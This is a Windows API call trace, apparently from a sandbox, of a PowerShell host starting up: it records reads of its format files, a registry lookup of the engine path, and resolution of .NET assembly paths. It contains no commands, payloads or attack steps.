	[0144.273] ReadFile (in: hFile=0x324, lpBuffer=0x34a3290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x34a3290*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.275] ReadFile (in: hFile=0x324, lpBuffer=0x34a3290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x34a3290*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.276] ReadFile (in: hFile=0x324, lpBuffer=0x34a3290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x34a3290*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.276] ReadFile (in: hFile=0x324, lpBuffer=0x34a3290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x34a3290*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.277] ReadFile (in: hFile=0x324, lpBuffer=0x34a3290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x34a3290*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.277] ReadFile (in: hFile=0x324, lpBuffer=0x34a3290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x34a3290*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.277] ReadFile (in: hFile=0x324, lpBuffer=0x34a3290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x34a3290*, lpNumberOfBytesRead=0x1ccdf8*=0xaca, lpOverlapped=0x0) returned 1
	[0144.278] ReadFile (in: hFile=0x324, lpBuffer=0x34a28c2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x34a28c2*, lpNumberOfBytesRead=0x1ccdf8*=0x0, lpOverlapped=0x0) returned 1
	[0144.278] ReadFile (in: hFile=0x324, lpBuffer=0x34a3290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x34a3290*, lpNumberOfBytesRead=0x1ccdf8*=0x0, lpOverlapped=0x0) returned 1
	[0144.278] CloseHandle (hObject=0x324) returned 1
	[0144.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0144.278] SetErrorMode (uMode=0x1) returned 0x1
	[0144.278] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ccda0 | out: lpFileInformation=0x1ccda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0144.278] SetErrorMode (uMode=0x1) returned 0x1
	[0144.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0144.279] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cce88 | out: phkResult=0x1cce88*=0x324) returned 0x0
	[0144.279] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cce0c, lpData=0x0, lpcbData=0x1cce08*=0x0 | out: lpType=0x1cce0c*=0x1, lpData=0x0, lpcbData=0x1cce08*=0x56) returned 0x0
	[0144.279] CoTaskMemAlloc (cb=0x5a) returned 0x34c6e0
	[0144.279] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccddc, lpData=0x34c6e0, lpcbData=0x1ccdd8*=0x56 | out: lpType=0x1ccddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ccdd8*=0x56) returned 0x0
	[0144.279] CoTaskMemFree (pv=0x34c6e0) 
	[0144.279] RegCloseKey (hKey=0x324) returned 0x0
	[0144.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0144.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0144.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0144.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0144.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0144.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0144.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0144.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0144.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0144.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0144.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0144.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0144.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0144.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0144.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0144.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0144.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0144.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0144.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0144.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.992] VirtualQuery (in: lpAddress=0x1cb920, lpBuffer=0x1cc7e0, dwLength=0x30 | out: lpBuffer=0x1cc7e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.993] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x451a0f2c, Data2=0xf06f, Data3=0x403b, Data4=([0]=0xa0, [1]=0xa1, [2]=0xb3, [3]=0xea, [4]=0x7d, [5]=0xa6, [6]=0x97, [7]=0x4e))) returned 0x0
	[0144.994] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xeb84629, Data2=0x815a, Data3=0x4372, Data4=([0]=0xa0, [1]=0x7d, [2]=0x36, [3]=0xe7, [4]=0x8f, [5]=0x3e, [6]=0xb8, [7]=0x2d))) returned 0x0
	[0144.995] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.996] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.997] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x7d209465, Data2=0x5083, Data3=0x48c4, Data4=([0]=0xa8, [1]=0x78, [2]=0x93, [3]=0x15, [4]=0x56, [5]=0xde, [6]=0x2, [7]=0x5))) returned 0x0
	[0145.000] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x83a608c7, Data2=0xb6a0, Data3=0x4330, Data4=([0]=0xad, [1]=0x36, [2]=0xad, [3]=0xbd, [4]=0xc0, [5]=0x45, [6]=0x11, [7]=0x5e))) returned 0x0
	[0145.000] VirtualQuery (in: lpAddress=0x1cbd20, lpBuffer=0x1ccbe0, dwLength=0x30 | out: lpBuffer=0x1ccbe0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.001] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.001] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.002] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x6e76eef9, Data2=0x5840, Data3=0x45b4, Data4=([0]=0x8a, [1]=0x7f, [2]=0xa5, [3]=0x9c, [4]=0x33, [5]=0xd3, [6]=0xc9, [7]=0x42))) returned 0x0
	[0145.002] VirtualQuery (in: lpAddress=0x1cbd20, lpBuffer=0x1ccbe0, dwLength=0x30 | out: lpBuffer=0x1ccbe0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.002] VirtualQuery (in: lpAddress=0x1cbb40, lpBuffer=0x1cca00, dwLength=0x30 | out: lpBuffer=0x1cca00*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.002] VirtualQuery (in: lpAddress=0x1cb390, lpBuffer=0x1cc250, dwLength=0x30 | out: lpBuffer=0x1cc250*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.011] VirtualQuery (in: lpAddress=0x1cb390, lpBuffer=0x1cc250, dwLength=0x30 | out: lpBuffer=0x1cc250*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.011] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xe06a321e, Data2=0x1790, Data3=0x4868, Data4=([0]=0xba, [1]=0x40, [2]=0x99, [3]=0x52, [4]=0xc6, [5]=0xc4, [6]=0x99, [7]=0xa2))) returned 0x0
	[0145.012] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x387ba4a3, Data2=0xf302, Data3=0x405e, Data4=([0]=0x81, [1]=0x69, [2]=0x7d, [3]=0x57, [4]=0x12, [5]=0xb0, [6]=0x95, [7]=0xf2))) returned 0x0
	[0145.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0145.012] SetErrorMode (uMode=0x1) returned 0x1
	[0145.012] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0145.013] GetFileType (hFile=0x324) returned 0x1
	[0145.013] SetErrorMode (uMode=0x1) returned 0x1
	[0145.013] GetFileType (hFile=0x324) returned 0x1
	[0145.013] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.014] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.014] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.014] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.015] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.015] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.015] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.016] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.017] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.017] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.017] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.017] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.018] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.018] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.113] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.114] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.115] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.116] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0xbce, lpOverlapped=0x0) returned 1
	[0145.116] ReadFile (in: hFile=0x324, lpBuffer=0x3554fbe, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3554fbe*, lpNumberOfBytesRead=0x1ccdf8*=0x0, lpOverlapped=0x0) returned 1
	[0145.116] ReadFile (in: hFile=0x324, lpBuffer=0x3555888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3555888*, lpNumberOfBytesRead=0x1ccdf8*=0x0, lpOverlapped=0x0) returned 1
	[0145.116] CloseHandle (hObject=0x324) returned 1
	[0145.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0145.117] SetErrorMode (uMode=0x1) returned 0x1
